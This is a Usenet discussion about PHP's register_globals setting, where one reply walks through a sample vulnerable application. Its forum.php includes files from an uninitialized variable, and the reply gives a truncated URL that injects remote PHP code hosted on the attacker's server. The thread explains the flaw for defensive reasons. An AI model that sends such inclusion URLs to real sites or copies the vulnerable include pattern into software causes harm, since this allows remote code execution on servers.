"Pedro Graca" <he****@dodgeit.com> wrote in message
news:sl*******************@ID-203069.user.uni-berlin.de...
lian wrote: I have installed a web-based software written in php which needs
that i should turn "register_globals" from off to on in the php.ini.
You probably can do that in a .htaccess file (in the directory that
software is put to) instead of changing the global php.ini.
Can someone give me some hints what is this *possible* security
problem if i turn the register_globals "on"? And what should i pay
attention when writing my own php program on a "register_globals on"
server to avoid some attack?
Initialize *all* variables and register_globals no longer has any
security impact for your code.
That statement is a little misleading. Yes, register_globals would not
promise your system if all global variables are initialized. Initializing
all global variables does not guarantee that would happen, however. If you
do not fully control your execution path, then your initialization code
could be bypassed.
This bring us back to the "why single entry point systems suck" discussion.
If the initialization of globals happen at the designated entry point, and
there exist in the application other unintended entry points (a very common
mistake), then register_globals becomes extremely dangerous. The example
below demonstrate the prototypical register_globals vulnerability.
In web application X, all pages are accessed through controller.php. This
script looks at a GET variable to determine which page to display.
Configuration information is stored in a file called config.php.
config.php:
<?
$CLASS_PATH = "/usr/lib/scripting/php/classes";
$DB_USER = "satan";
$DB_NAME = "hell";
/* other variables */
?>
controller.php:
<?
require("config.php");
require("header.php");
switch($_GET['section']) {
case 'forum': require("forum.php"); break;
case 'about': require("about.php"); break;
/* other pages */
default: require("main.php");
}
require("footer.php");
?>
forum.php:
<?
require("$CLASS_PATH/UI.View.Message.php");
require("$CLASS_PATH/UI.View.MessageThread.php");
require("$CLASS_PATH/UI.Widget.HTMLEditor.php");
/* do stuff */
?>
The vulnerability is in forum.php. Even through controller.php is the page
that people are supposed to go through, nothing stops them from accessing
forum.php directly, in which case $CLASS_PATH is no longer initialized. And
as you know, require() can read files from a remote source. So an attacker
can inject arbituary PHP code into the script with this URL:
http://www.hell.uz/forum.php?CLASS_P...666.28/dk.txt?
where dk.txt, sitting on the attacker's server, holds the malicious code.
The real design flaw here is allowing remote require/include. Instead of
fixing that the PHP team decided to banish register_globals. Oh well.